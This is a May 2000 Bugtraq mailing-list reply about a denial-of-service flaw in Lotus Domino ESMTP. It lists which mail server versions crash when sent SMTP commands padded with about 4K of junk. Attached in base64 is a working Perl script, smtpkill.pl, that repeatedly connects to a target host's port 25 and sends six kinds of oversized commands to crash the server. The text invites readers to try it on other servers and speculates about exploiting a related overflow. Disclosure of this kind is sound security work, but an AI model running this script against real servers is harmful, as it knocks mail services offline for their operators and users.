[15000] in bugtraq
Re: Lotus ESMTP Service (Lotus Domino Release 5.0.1 (Intl))
daemon@ATHENA.MIT.EDU (SMILER)
Tue May 23 14:18:55 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00E9_01BFC4B8.FF247870"
Message-Id: <00ed01bfc4b0$9d64a450$2e483dc3@contentlab.net>
Date: Tue, 23 May 2000 13:15:42 +0100
Reply-To: SMILER <smiler@VXD.ORG>
From: SMILER <smiler@VXD.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
------=_NextPart_000_00E9_01BFC4B8.FF247870
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_00EA_01BFC4B8.FF247870"
------=_NextPart_001_00EA_01BFC4B8.FF247870
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain;
charset="iso-8859-1"
Well I tryed this in :=20
* Lotus Domino ESMTP Services running Version 5.0.3 (Intl) and smtp died =
also after mail from: someone@4k_junk=20
* Lotus Domino ESMTP version 5.0.2 (Intl) is also vulnerable to this.
* I also tryed this against Version 5.0.2c (Intl) without success in DOS =
so=20
I assume that 5.0.2c(Intl) is not vulnerable.=20
* Merak Server Version 2.10.270 is not also vulnerable.=20
* CMail Server version 2.4.6 is not vulnerable to mail from: =
someone@4k_junk=20
BUT is vulnerable to something_4k_junk ! In fact this software even logs =
"mail from: someone@4k_junk" as a DOS attempt but crashes when you just =
send=20
something_4k_junk !=20
* Argosoft Mail Server version 1.2.1.0 doesn=B4t crash with "mail from:=20
someon@4k:_junk" but after some messages it will log : Error: Access=20
violation at address 00459CBB in module 'MAILSERVER.EXE'. Read of =
address=20
FFFFFFFF but it will continue to serve :) Maybe we could make something=20
funny with this overflow (?) ;)))=20
* Many others where I haven=B4t tryed this...?
I am attaching a demonstration code (perl) for those who want to check =
any other=20
servers that might be vulnerable to this.=20
smiler@vxd.org=20
>On Thu, May 18, 2000 at 09:11:33PM +0200, Michal Zalewski wrote:=20
>> Not much to say. While performing basic input validation checks in =
Lotus=20
>> Domino ESMTP service (see subject) running on the top of Windows NT=20
system=20
>[snip.. ]=20
>=20
>I'm running r5.0.2b on a Sun E420R w/ patched up Solaris 7 and got a=20
>confirmed kill on one of our notes servers:=20
------=_NextPart_001_00EA_01BFC4B8.FF247870
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html;
charset="iso-8859-1"
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2314.1000" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Well I tryed this in : <BR><BR>* Lotus =
Domino ESMTP=20
Services running Version 5.0.3 (Intl) and smtp died <BR>also after mail =
from:=20
someone@4k_junk </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>* Lotus Domino ESMTP version 5.0.2 =
(Intl) is also=20
vulnerable to this.<BR><BR>* I also tryed this against Version 5.0.2c =
(Intl)=20
without success in DOS so <BR>I assume that 5.0.2c(Intl) is not =
vulnerable.=20
<BR><BR>* Merak Server Version 2.10.270 is not also vulnerable. =
<BR><BR>* CMail=20
Server version 2.4.6 is not vulnerable to mail from: someone@4k_junk =
<BR>BUT is=20
vulnerable to something_4k_junk ! In fact this software even logs =
<BR>"mail=20
from: someone@4k_junk" as a DOS attempt but crashes when you just send=20
<BR>something_4k_junk ! <BR><BR>* Argosoft Mail Server version 1.2.1.0 =
doesn=B4t=20
crash with "mail from: <BR>someon@4k:_junk" but after some messages it =
will log=20
: Error: Access <BR>violation at address 00459CBB in module =
'MAILSERVER.EXE'.=20
Read of address <BR>FFFFFFFF but it will continue to serve :) Maybe we =
could=20
make something <BR>funny with this overflow (?) ;))) <BR></DIV></FONT>
<DIV><FONT face=3DArial size=3D2>* Many others where I haven=B4t tryed=20
this...?</FONT></DIV>
<DIV><FONT face=3DArial size=3D2><BR>I am attaching a demonstration code =
(perl) for=20
those who want to check any other <BR>servers that might be vulnerable =
to this.=20
<BR><BR>smiler@vxd.org <BR><BR><BR><BR><BR>>On Thu, May 18, 2000 at=20
09:11:33PM +0200, Michal Zalewski wrote: <BR>>> Not much to say. =
While=20
performing basic input validation checks in Lotus <BR>>> Domino =
ESMTP=20
service (see subject) running on the top of Windows NT <BR>system=20
<BR>>[snip.. ] <BR>> <BR>>I'm running r5.0.2b on a Sun E420R w/ =
patched=20
up Solaris 7 and got a <BR>>confirmed kill on one of our notes =
servers:=20
</FONT></DIV></BODY></HTML>
------=_NextPart_001_00EA_01BFC4B8.FF247870--
------=_NextPart_000_00E9_01BFC4B8.FF247870
Content-Type: application/octet-stream;
name="smtpkill.pl"
Content-Disposition: attachment;
filename="smtpkill.pl"
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9wZXJsDQojIE5lZWQgbmV0Ojp0ZWxuZXQgdG8gcnVuDQojIEV4cGwwaXQgQnkg
c21pbGVyQHZ4ZC5vcmcNCiMgVGVzdGVkIHdpdGggc3VjZXNzIGFnYWluc3QgTG90dXMgTm90ZXMg
NS4wLjEsIDUuMC4yYiwgNS4wLjMNCiMgQ01haWwgU2VydmVyIHZlcnNpb24gMi40LjYsIEFyZ29z
b2Z0IE1haWwgU2VydmVyIHZlcnNpb24gMS4yLjEuMCANCiMgYW5kIHByb2JhYmx5IG1hbnkgb3Ro
ZXJzIHRoYXQgSSBoYWRutHQgY2hhbmNlIHRvIGV4cGxvcmUuDQojIEkgd3JvdGUgdGhpcyBhZnRl
ciBNaWNoYWwgWmFsZXdza2kgYnJvdWdodCB0aGlzIGlzc3VlIGluIEJ1Z1RyYXEuDQojIENoZWVy
cyAzNTEgYW5kIEZyYWN0YWxHIDopDQoNCnVzZSBOZXQ6OlRlbG5ldDsgICANCg0KDQpwcmludCAi
U210cEtJTEwgQnkgc21pbGVyXEB2eGQub3JnXG4iOw0KDQppZiAobm90ICRBUkdWWzFdKSB7DQpw
cmludCBxcX4NClVzYWdlIDogc210cGtpbGwucGwgIDx0eXBlPiA8aG9zdD4NCgk8dHlwZT4gVHlw
ZSBvZiBhdHRhY2sgOg0KCQl0eXBlIDEgPSBsb25nIG1haWwgZnJvbTogc29tZW9uZVxANGtfb2Zf
anVuaw0KCQl0eXBlIDIgPSBsb25nIHJjcHQgdG86IHNvbWVvbmVcQDRrX29mX2p1bmsNCgkJdHlw
ZSAzID0gbG9uZyBoZWxvIGxvbmdkb21haW5fd2l0aF80a19vZl9qdW5rDQoJCXR5cGUgNCA9IGxv
bmcgdW5kZWZpbmVkIGNvbW1hbmQgKDRrX29mX2p1bmspDQoJCXR5cGUgNSA9IGxvbmcgaGVscCA0
a19vZl9qdW5rDQoJCXR5cGUgNiA9IGxvbmcgbWFpbCBmcm9tOiBhbmQgbWFpbCB0bzoNCg0KCTxo
b3N0PiBIb3N0IHRoYXQgeW91IHdhbnQgdG8gRE9TLCBJcCBvciBEb21haW4gd2lsbCBiZSBvay4N
CkV4YW1wbGUgVXNhZ2UgOiBzbXRwa2lsbC5wbCA1IDEyNy4wLjAuMQ0KfjsgZXhpdDt9ICAgICAg
DQoNCiR0eXBlPSRBUkdWWzBdOw0KJHRhcmdldD0kQVJHVlsxXTsNCg0KcHJpbnQgIlRZUEUgQVRU
QUNLOiAkdHlwZVxuIjsNCnByaW50ICJUQVJHRVQgOiAkdGFyZ2V0XG4iOw0KDQoNCg0KZm9yICgk
aT00MDk2OyRpPDUwOTY7JGkrKykNCiB7DQogICAgICAgICRvYmo9TmV0OjpUZWxuZXQtPm5ldygg
SG9zdCA9PiAiJHRhcmdldCIsUG9ydCA9PiAyNSk7ICAgIA0KDQoJaWYgKCR0eXBlPX4gIjEiKSB7
IA0KCSRoZWxvPSJoZWxvIHB0cnVsZXoiOw0KCSRmcm9tPSJtYWlsIGZyb206IHYwdjBAIi4gJ3B0
cnVsZXonIHggJGk7DQoJJHJjcHQ9InJjcHQgdG86IHYwdjBcQHYwdjAucHQiOw0KCX0NCg0KCWlm
ICgkdHlwZT1+ICIyIikgeyANCgkkaGVsbz0iaGVsbyBwdHJ1bGV6IjsNCgkkZnJvbT0ibWFpbCBm
cm9tOiB2MHYwXEB2MHYwLnB0IjsNCgkkcmNwdD0icmNwdCB0bzogdjB2MEAiLiAncHRydWxleicg
eCAkaTsNCgl9DQoNCglpZiAoJHR5cGU9fiAiMyIpIHsNCgkkaGVsbz0iaGVsbyAiLiAncHRydWxl
eicgeCAkaTsNCgkkZnJvbT0ibWFpbCBmcm9tOiB2MHYwXEB2MHYwLnB0IjsNCgkkcmNwdD0icmNw
dCB0bzogdjB2MFxAdjB2MC5wdCI7DQoJfQ0KDQoJaWYgKCR0eXBlPX4gIjQiKSB7DQoJJGhlbG89
ImhhdmVzb21lZnVuIi4gJ3B0cnVsZXonIHggJGk7DQoJfQ0KDQoJaWYgKCR0eXBlPX4gIjUiKSB7
DQoJJGhlbG89ImhlbHAgIi4gJ3B0cnVsZXonIHggJGk7DQoJfQ0KDQoJaWYgKCR0eXBlPX4gIjYi
KSB7DQoJJGhlbG89ImhlbG8gcHRydWxleiI7DQoJJGZyb209Im1haWwgZnJvbTogIi4gJ3B0cnVs
ZXonIHggJGk7DQoJJHJjcHQ9InJjcHQgdG86ICIuICdwdHJ1bGV6JyB4ICRpOw0KCX0NCg0KICAg
ICAgICBwcmludCAiJGhlbG9cbiI7JG9iai0+cHJpbnQoIiRoZWxvIik7ICAgDQogICAgICAgIHBy
aW50ICIkZnJvbVxuIjskb2JqLT5wcmludCgiJGZyb20iKTsNCiAgICAgICAgcHJpbnQgIiRyY3B0
XG4iOyRvYmotPnByaW50KCIkcmNwdCIpOyAgICANCiAgICAgICAgJG9iai0+Y2xvc2U7DQogfQ0K
DQo=
------=_NextPart_000_00E9_01BFC4B8.FF247870--
